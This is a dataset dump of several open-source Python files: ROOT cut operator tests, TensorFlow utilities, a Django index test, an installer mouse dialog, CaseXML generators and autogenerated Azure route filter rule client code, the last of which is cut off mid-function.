repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
OstapHEP/ostap | ostap/trees/tests/test_trees_cuts.py | 1 | 2761 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# @file ostap/trees/tests/test_trees_cuts.py
# Copyright (c) Ostap developers.
# =============================================================================
""" Test module for ostap/trees/cuts.py.
"""
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
if '__main__' == __name__ : logger = getLogger ( 'test_trees_cuts' )
else : logger = getLogger ( __name__ )
# =============================================================================
import ROOT
import ostap.trees.cuts
def test_cuts() :
## inversion:
a = ROOT.TCut()
assert ~a, "Empty cut must be ``zero'': ``%s''" % a
a = ROOT.TCut('pt/p')
logger.info ( 'a = %s' % a )
logger.info ( 'a+1 = %s' % ( a + 1 ) )
logger.info ( 'a-1 = %s' % ( a - 1 ) )
logger.info ( 'a*1 = %s' % ( a * 1 ) )
logger.info ( 'a/1 = %s' % ( a / 1 ) )
logger.info ( '1+a = %s' % ( 1 + a ) )
logger.info ( '1-a = %s' % ( 1 - a ) )
logger.info ( '1*a = %s' % ( 1 * a ) )
logger.info ( '1/a = %s' % ( 1 / a ) )
q = ROOT.TCut(a)
q += 1
logger.info ( 'a += 1 %s' % q )
q = ROOT.TCut(a)
q -= 1
logger.info ( 'a -= 1 %s' % q )
q = ROOT.TCut(a)
q *= 1
logger.info ( 'a *= 1 %s' % q )
q = ROOT.TCut(a)
q /= 1
logger.info ( 'a /= 1 %s' % q )
b = ROOT.TCut('pt>p')
c = ROOT.TCut('x>4' )
logger.info ( 'b,c = %s, %s' % ( b , c ) )
logger.info ( 'b&c = %s ' % ( b & c ) )
logger.info ( 'b|c = %s ' % ( b | c ) )
q = ROOT.TCut(b)
q &= c
logger.info ( 'b&=c %s ' % q )
q = ROOT.TCut(b)
q |= c
logger.info ( 'b|=c %s ' % q )
q = 'z<y'
logger.info ( 'b,q = %s, %s' % ( b , q ) )
logger.info ( 'b&q = %s ' % ( b & q ) )
logger.info ( 'b|q = %s ' % ( b | q ) )
logger.info ( 'q&b = %s ' % ( q & b ) )
logger.info ( 'q|b = %s ' % ( q | b ) )
w = ROOT.TCut(b)
w &= q
logger.info ( 'b&=q %s ' % w )
w = ROOT.TCut(b)
w |= q
logger.info ( 'b|=q %s ' % w )
# =============================================================================
if '__main__' == __name__ :
test_cuts ()
# =============================================================================
# The END
# =============================================================================
| bsd-3-clause |
ppwwyyxx/tensorflow | tensorflow/python/eager/backprop_util.py | 8 | 1335 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Shared utilities related to backprop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
def IsTrainable(tensor_or_dtype):
if tensor_util.is_tensor(tensor_or_dtype):
dtype = tensor_or_dtype.dtype
else:
dtype = tensor_or_dtype
dtype = dtypes.as_dtype(dtype)
return dtype.base_dtype in (dtypes.float16, dtypes.float32, dtypes.float64,
dtypes.complex64, dtypes.complex128,
dtypes.resource, dtypes.variant)
| apache-2.0 |
felixjimenez/django | tests/indexes/tests.py | 40 | 1585 | from django.core.management.color import no_style
from django.db import connection, connections, DEFAULT_DB_ALIAS
from django.test import TestCase
from django.utils.unittest import skipUnless
from .models import Article
class IndexesTests(TestCase):
def test_index_together(self):
connection = connections[DEFAULT_DB_ALIAS]
index_sql = connection.creation.sql_indexes_for_model(Article, no_style())
self.assertEqual(len(index_sql), 1)
@skipUnless(connections[DEFAULT_DB_ALIAS].vendor == 'postgresql',
"This is a postgresql-specific issue")
def test_postgresql_text_indexes(self):
"""Test creation of PostgreSQL-specific text indexes (#12234)"""
from .models import IndexedArticle
connection = connections[DEFAULT_DB_ALIAS]
index_sql = connection.creation.sql_indexes_for_model(IndexedArticle, no_style())
self.assertEqual(len(index_sql), 5)
self.assertIn('("headline" varchar_pattern_ops)', index_sql[1])
self.assertIn('("body" text_pattern_ops)', index_sql[3])
# unique=True and db_index=True should only create the varchar-specific
# index (#19441).
self.assertIn('("slug" varchar_pattern_ops)', index_sql[4])
@skipUnless(connection.vendor == 'postgresql',
"This is a postgresql-specific issue")
def test_postgresql_virtual_relation_indexes(self):
"""Test indexes are not created for related objects"""
index_sql = connection.creation.sql_indexes_for_model(Article, no_style())
self.assertEqual(len(index_sql), 1)
| bsd-3-clause |
jbedorf/tensorflow | tensorflow/contrib/distributions/python/ops/bijectors/invert.py | 35 | 4257 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Invert bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops.distributions import bijector
from tensorflow.python.util import deprecation
__all__ = [
"Invert",
]
class Invert(bijector.Bijector):
"""Bijector which inverts another Bijector.
Example Use: [ExpGammaDistribution (see Background & Context)](
https://reference.wolfram.com/language/ref/ExpGammaDistribution.html)
models `Y=log(X)` where `X ~ Gamma`.
```python
exp_gamma_distribution = TransformedDistribution(
distribution=Gamma(concentration=1., rate=2.),
bijector=bijector.Invert(bijector.Exp())
```
"""
@deprecation.deprecated(
"2018-10-01",
"The TensorFlow Distributions library has moved to "
"TensorFlow Probability "
"(https://github.com/tensorflow/probability). You "
"should update all references to use `tfp.distributions` "
"instead of `tf.contrib.distributions`.",
warn_once=True)
def __init__(self, bijector, validate_args=False, name=None):
"""Creates a `Bijector` which swaps the meaning of `inverse` and `forward`.
Note: An inverted bijector's `inverse_log_det_jacobian` is often more
efficient if the base bijector implements `_forward_log_det_jacobian`. If
`_forward_log_det_jacobian` is not implemented then the following code is
used:
```python
y = self.inverse(x, **kwargs)
return -self.inverse_log_det_jacobian(y, **kwargs)
```
Args:
bijector: Bijector instance.
validate_args: Python `bool` indicating whether arguments should be
checked for correctness.
name: Python `str`, name given to ops managed by this object.
"""
if not bijector._is_injective: # pylint: disable=protected-access
raise NotImplementedError(
"Invert is not implemented for non-injective bijectors.")
self._bijector = bijector
super(Invert, self).__init__(
graph_parents=bijector.graph_parents,
forward_min_event_ndims=bijector.inverse_min_event_ndims,
inverse_min_event_ndims=bijector.forward_min_event_ndims,
is_constant_jacobian=bijector.is_constant_jacobian,
validate_args=validate_args,
dtype=bijector.dtype,
name=name or "_".join(["invert", bijector.name]))
def _forward_event_shape(self, input_shape):
return self.bijector._inverse_event_shape(input_shape) # pylint: disable=protected-access
def _forward_event_shape_tensor(self, input_shape):
return self.bijector._inverse_event_shape_tensor(input_shape) # pylint: disable=protected-access
def _inverse_event_shape(self, output_shape):
return self.bijector._forward_event_shape(output_shape) # pylint: disable=protected-access
def _inverse_event_shape_tensor(self, output_shape):
return self.bijector._forward_event_shape_tensor(output_shape) # pylint: disable=protected-access
@property
def bijector(self):
return self._bijector
def _forward(self, x, **kwargs):
return self.bijector._inverse(x, **kwargs) # pylint: disable=protected-access
def _inverse(self, y, **kwargs):
return self.bijector._forward(y, **kwargs) # pylint: disable=protected-access
def _inverse_log_det_jacobian(self, y, **kwargs):
return self.bijector._forward_log_det_jacobian(y, **kwargs) # pylint: disable=protected-access
def _forward_log_det_jacobian(self, x, **kwargs):
return self.bijector._inverse_log_det_jacobian(x, **kwargs) # pylint: disable=protected-access
| apache-2.0 |
sergey-senozhatsky/anaconda-11-vlan-support | textw/mouse_text.py | 1 | 3460 | #
# mouse_text.py: text mode mouse selection dialog
#
# Copyright 2000-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
from snack import *
from constants_text import *
from rhpl.translate import _
class MouseDeviceWindow:
def __call__(self, screen, mouse):
choices = { _("/dev/ttyS0 (COM1 under DOS)") : "ttyS0",
_("/dev/ttyS1 (COM2 under DOS)") : "ttyS1",
_("/dev/ttyS2 (COM3 under DOS)") : "ttyS2",
_("/dev/ttyS3 (COM4 under DOS)") : "ttyS3" }
i = 0
default = 0
mousedev = mouse.getDevice()
if (not mousedev or mousedev[0:4] != "ttyS"): return INSTALL_NOOP
l = choices.keys()
l.sort()
for choice in l:
if choices[choice] == mousedev:
default = i
break
i = i + 1
(button, result) = ListboxChoiceWindow(screen, _("Device"),
_("What device is your mouse located on?"), l,
[ TEXT_OK_BUTTON, TEXT_BACK_BUTTON ], help = "mousedevice", default = default )
if button == TEXT_BACK_CHECK:
return INSTALL_BACK
mouse.setDevice(choices[l[result]])
return INSTALL_OK
class MouseWindow:
def listcb(self):
if self.mice[self.micenames[self.l.current()]][3]:
self.c.setValue("*")
else:
self.c.setValue(" ")
def __call__(self, screen, mouse):
# XXX ewt changed this and we can't figure out why -- we always
# want to display this dialog so that you can turn on 3 button emu
# if mouse.probed(): return
self.mice = mouse.available ()
mice = self.mice.keys ()
mice.sort ()
self.micenames = mice
(default, emulate) = mouse.get ()
if default == "Sun - Mouse":
return INSTALL_NOOP
default = mice.index (default)
bb = ButtonBar(screen, [TEXT_OK_BUTTON, TEXT_BACK_BUTTON])
t = TextboxReflowed(40,
_("Which model mouse is attached to this computer?"))
l = Listbox(8, scroll = 1, returnExit = 0)
self.l = l
key = 0
for amouse in mice:
l.append(_(amouse), key)
key = key + 1
l.setCurrent(default)
l.setCallback (self.listcb)
c = Checkbox(_("Emulate 3 Buttons?"), isOn = emulate)
self.c = c
g = GridFormHelp(screen, _("Mouse Selection"), "mousetype", 1, 4)
g.add(t, 0, 0)
g.add(l, 0, 1, padding = (0, 1, 0, 1))
g.add(c, 0, 2, padding = (0, 0, 0, 1))
g.add(bb, 0, 3, growx = 1)
rc = g.runOnce()
button = bb.buttonPressed(rc)
if button == TEXT_BACK_CHECK:
return INSTALL_BACK
choice = l.current()
emulate = c.selected()
mouse.set(mice[choice], emulate)
oldDev = mouse.getDevice()
if (oldDev):
newDev = mouse.available()[mice[choice]][2]
if ((oldDev[0:4] == "ttyS" and newDev[0:4] == "ttyS") or
(oldDev == newDev)):
pass
else:
mouse.setDevice(newDev)
return INSTALL_OK
| gpl-2.0 |
benrudolph/commcare-hq | corehq/ex-submodules/casexml/apps/case/xml/generator.py | 2 | 6350 | from casexml.apps.case.xml import V1, V2, V3, check_version, V2_NAMESPACE
from xml.etree import ElementTree
import logging
from dimagi.utils.parsing import json_format_datetime, json_format_date
def safe_element(tag, text=None):
# shortcut for commonly used functionality
# bad! copied from the phone's XML module
if text:
e = ElementTree.Element(tag)
e.text = unicode(text)
return e
else:
return ElementTree.Element(tag)
def date_to_xml_string(date):
return json_format_date(date) if date else ''
def get_dynamic_element(key, val):
"""
Gets an element from a key/value pair assumed to be pulled from
a case object (usually in the dynamic properties)
"""
element = ElementTree.Element(key)
if isinstance(val, dict):
element.text = unicode(val.get('#text', ''))
element.attrib = dict([(x[1:], unicode(val[x])) for x in \
filter(lambda x: x and x.startswith("@"), val.keys())])
else:
# assume it's a string. Hopefully this is valid
element.text = unicode(val)
return element
class CaseXMLGeneratorBase(object):
# The breakdown of functionality here is a little sketchy, but basically
# everything that changed from v1 to v2 gets a split. The rest is
# attempted to be as DRY as possible
def __init__(self, case):
self.case = case
# Force subclasses to override any methods that we don't explictly
# want to implement in the base class. However fill in a lot ourselves.
def _ni(self):
raise NotImplementedError("That method must be overridden by subclass!")
def get_root_element(self):
self._ni()
def get_create_element(self):
return safe_element("create")
def get_update_element(self):
return safe_element("update")
def get_close_element(self):
return safe_element("close")
def get_index_element(self, index):
elem = safe_element(index.identifier, index.referenced_id)
elem.attrib = {"case_type": index.referenced_type}
return elem
def get_case_type_element(self):
self._ni()
def get_user_id_element(self):
return safe_element("user_id", self.case.user_id)
def get_case_name_element(self):
return safe_element("case_name", self.case.name)
def get_external_id_element(self):
return safe_element("external_id", self.case.external_id)
def add_base_properties(self, element):
element.append(self.get_case_type_element())
element.append(self.get_case_name_element())
def add_custom_properties(self, element):
for k, v, in self.case.dynamic_case_properties():
element.append(get_dynamic_element(k, v))
def add_indices(self, element):
self._ni()
class V1CaseXMLGenerator(CaseXMLGeneratorBase):
def get_root_element(self):
root = safe_element("case")
# moved to attrs in v2
root.append(safe_element("case_id", self.case.get_id))
root.append(safe_element("date_modified",
json_format_datetime(self.case.modified_on)))
return root
def get_case_type_element(self):
return safe_element("case_type_id", self.case.type)
def add_base_properties(self, element):
element.append(self.get_case_type_element())
# moved in v2
element.append(self.get_user_id_element())
element.append(self.get_case_name_element())
# deprecated in v2
element.append(self.get_external_id_element())
def add_custom_properties(self, element):
if self.case.owner_id:
element.append(safe_element('owner_id', self.case.owner_id))
super(V1CaseXMLGenerator, self).add_custom_properties(element)
def add_indices(self, element):
# intentionally a no-op
if self.case.indices:
logging.info("Tried to add indices to version 1 CaseXML restore. This is not supported. "
"The case id is %s, domain %s." % (self.case.get_id, self.case.domain))
def add_attachments(self, element):
pass
class V2CaseXMLGenerator(CaseXMLGeneratorBase):
def get_root_element(self):
root = safe_element("case")
root.attrib = {
"xmlns": V2_NAMESPACE,
"case_id": self.case.get_id,
"user_id": self.case.user_id or '',
"date_modified": json_format_datetime(self.case.modified_on)}
return root
def get_case_type_element(self):
# case_type_id --> case_type
return safe_element("case_type", self.case.type)
def add_base_properties(self, element):
super(V2CaseXMLGenerator, self).add_base_properties(element)
# owner id introduced in v2
# default to user_id for 1.3 compatibility
element.append(safe_element('owner_id', self.case.owner_id or self.case.user_id))
def add_custom_properties(self, element):
if self.case.external_id:
element.append(safe_element('external_id', self.case.external_id))
super(V2CaseXMLGenerator, self).add_custom_properties(element)
def add_indices(self, element):
if self.case.indices:
indices = []
index_elem = safe_element("index")
for i in self.case.indices:
indices.append(self.get_index_element(i))
indices.sort(key=lambda elem: elem.tag)
for index in indices:
index_elem.append(index) # .extend() only works in python 2.7
element.append(index_elem)
def add_attachments(self, element):
if self.case.case_attachments:
attachment_elem = safe_element("attachment")
for k, a in self.case.case_attachments.items():
aroot = safe_element(k)
# moved to attrs in v2
aroot.attrib = {
"src": self.case.get_attachment_server_url(k),
"from": "remote"
}
attachment_elem.append(aroot)
element.append(attachment_elem)
def get_generator(version, case):
check_version(version)
return GENERATOR_MAP[version](case)
GENERATOR_MAP = {
V1: V1CaseXMLGenerator,
V2: V2CaseXMLGenerator,
V3: V2CaseXMLGenerator
}
| bsd-3-clause |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/aio/operations/_route_filter_rules_operations.py | 1 | 28520 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RouteFilterRulesOperations:
"""RouteFilterRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified rule from a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the rule.
:type rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def get(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
**kwargs
) -> "_models.RouteFilterRule":
"""Gets the specified rule from a route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the rule.
:type rule_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RouteFilterRule, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_02_01.models.RouteFilterRule
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.RouteFilterRule",
**kwargs
) -> "_models.RouteFilterRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(route_filter_rule_parameters, 'RouteFilterRule')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.RouteFilterRule",
**kwargs
) -> AsyncLROPoller["_models.RouteFilterRule"]:
"""Creates or updates a route in the specified route filter.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param route_filter_name: The name of the route filter.
:type route_filter_name: str
:param rule_name: The name of the route filter rule.
:type rule_name: str
:param route_filter_rule_parameters: Parameters supplied to the create or update route filter
rule operation.
:type route_filter_rule_parameters: ~azure.mgmt.network.v2019_02_01.models.RouteFilterRule
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RouteFilterRule or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2019_02_01.models.RouteFilterRule]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
route_filter_name=route_filter_name,
rule_name=rule_name,
route_filter_rule_parameters=route_filter_rule_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.PatchRouteFilterRule",
**kwargs
) -> "_models.RouteFilterRule":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RouteFilterRule"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(route_filter_rule_parameters, 'PatchRouteFilterRule')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('RouteFilterRule', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'} # type: ignore
async def begin_update(
self,
resource_group_name: str,
route_filter_name: str,
rule_name: str,
route_filter_rule_parameters: "_models.PatchRouteFilterRule",
**kwargs
